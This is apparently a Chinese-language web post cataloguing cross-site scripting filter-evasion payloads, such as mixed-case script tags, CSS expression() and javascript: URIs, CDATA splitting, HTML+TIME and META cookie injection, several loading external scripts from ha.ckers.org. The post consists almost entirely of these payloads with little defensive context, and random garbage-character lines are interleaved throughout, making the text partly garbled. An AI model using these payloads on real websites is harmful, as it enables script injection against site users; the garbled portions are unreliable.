Cross Site Scripting(XSS)攻击手法介绍

admin

1. 改变字符大小写
7 M" W) B% W" t. |5 R  }8 R
9 v; ]+ h' i% q
- g( j/ d* e4 u2 k, {% k
    <sCript>alert(‘d’)</scRipT>
7 q5 K2 {: H7 }' s' i1 z
8 _, ~8 Z# T' J" L3 r. {% e2. 利用多加一些其它字符来规避Regular Expression的检查

    <<script>alert(‘c’)//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>
. i# Q+ V6 U9 y, \& G1 Q# N& t
    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
$ j% _- K* m3 ^0 h/ P2 {9 J
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>
" _+ B  g! W5 w
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>

3. 以其它扩展名取代.js

    <script src="bad.jpg"></script>

( z. {; l. [+ K' V& I4. 将Javascript写在CSS档里
) m- _$ }2 ]" b, Q
# {3 ~3 K! X0 l% v! r    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
, O/ B5 E! N' l+ I
7 ~  b/ k0 f! J7 N& Y6 q5 q       example:

- q- ]5 N# p( F' M          body {

               background-image: url(‘javascript:alert("XSS");’)

5 m/ G. Z! L& t3 [          }
4 N6 l5 p) s+ X4 W4 a% J' m% c/ H
7 [% ~3 U2 X$ d  k/ Z$ |* m5. 在script的tag里加入一些其它字符
$ a" d/ T2 }  T- y2 Z, l" p, K5 ^
, e3 j( A" K) k0 H6 H    <SCRIPT/SRC="t.js"></SCRIPT>
. a+ T( W; u: j* T$ n3 E
- h" n* W6 k) B& w    <SCRIPT/anyword SRC="t.js"></SCRIPT>
( e9 B5 ?9 E$ R8 S
( N8 I& X* O% u2 F6. 使用tab或是new line来规避
9 T4 W1 m6 O$ |( m! m0 S  ]
, [2 z6 q1 Y6 J4 v& g    <img src="jav ascr ipt:alert(‘XSS3′)">

    <img src="jav ascr ipt:alert(‘XSS3′)">

    <IMG SRC="jav ascript:alert(‘XSS’);">
+ ^9 ^% A/ h9 P* x, R6 Q
0 q/ f: C9 Q. [: T         -> tag
  G" `" R1 i7 S; S& V! ~1 e9 u
1 t5 |; F+ `3 B' K& v$ ^         -> new line

7. 使用"\"来规避
3 P, Q( I% I, ~6 f8 I
8 A* Q7 t: z" G8 _) ~( t    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
# L9 s4 N% x" V( u
- s" J& u! V% X' e! P8 y- D+ h+ R& m    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
, Q) l: N' D3 a/ r+ Z% }
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
' q7 f. t, N0 l, R0 m' r8 j" R
. r( a+ w5 \- }. H9 B    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 W* {" C- E) Z3 @
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
  h( n  t( |9 h0 B% b7 H& p. N3 }
+ A/ j5 ]; {/ Y% a7 x/ p! y8. 使用Hex encode来规避(也可能会把";"拿掉)

    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( q3 K2 J) B0 C/ r# p/ y; A  p
) S. d: l$ j" h7 D% {        原始码：<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">

( j: v' y) \$ c+ {& V        原始码：<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
3 i. E2 N7 X* a( @+ e( }/ h( o
$ C, {$ D5 v- I" f% y0 d1 c9. script in HTML tag
# H  h: ]8 y8 f& F4 p
" f3 }& ?  J( ~( {    <body onload=」alert(‘onload’)」>

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. 在swf里含有xss的code

* @" d8 D& G# |& H/ E6 D2 t    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
0 J- Q  [0 u" }" c" m; p( I( {# A
( P- x# r" i# w4 s( ]' R11. 利用CDATA将xss的code拆开，再组合起来。
3 s& M+ }  G! c/ Y! O. `4 j, `
    <XML ID=I><X><C>
4 b1 \; I; W- g0 [  C9 ~
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

; T% b! g- c+ O1 ?" K    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
, B' a5 `* O! }( W
& {1 B0 g# y) Q( d* q6 L    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
' a: O4 O# b( n- k0 y6 c0 T
; ]- O5 N2 C1 n9 l/ v( F$ t+ S+ h* q1 x    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. 利用HTML+TIME。

- x- M% x+ n  [- l. R9 ~* P    <HTML><BODY>
3 G) K% v& S. `2 i! ~2 l# L
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

, h& w! X2 f) Z: J    <?import namespace="t" implementation="#default#time2">

! {, g5 `# s% e; g/ R( z    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
; X8 a* n% r) y' X* A
9 `' h# D: [$ j' ~: G2 @+ T$ g6 W" ]    </BODY></HTML>
1 e& r2 h4 w7 @6 K2 ]+ [! a. a2 `
7 g! b- [  _/ }/ C' a! [- U7 ^13. 透过META写入Cookie。
9 W; w  ?  n: b; p. ]5 b( i
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">

14. javascript in src , href , url
: i* C. d: w- U6 y% ?2 T: W
: l, `2 b' Y) o+ N8 E9 u6 c4 m    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
& f8 O* ^% y. z! n- Y/ P" v
0 w: `! G# N. B! l3 W    <img src="javascript:alert(‘XSS3′)">
/ a( w. s6 y# d7 y# n
1 f$ M& P. n% G<IMG DYNSRC="javascript:alert(‘XSS20′)">

    <IMG LOWSRC="javascript:alert(‘XSS21′)">

- ^0 l" v3 P, d4 L3 {    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
8 \0 T! g9 v/ A4 ~/ J$ g
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
8 j+ v2 I: [# o, n9 \
) D8 i+ B8 S8 m- a. Y    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
$ {1 M; n' B0 b
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
  V0 O  _5 E6 i' N4 n) N, b% o
    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
; I7 C8 J2 \$ T0 l+ t; g
    </STYLE><A CLASS=XSS></A>
( t  X4 l5 b4 C. V
+ L, k0 T+ ?1 ^( P+ H( E2 q    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>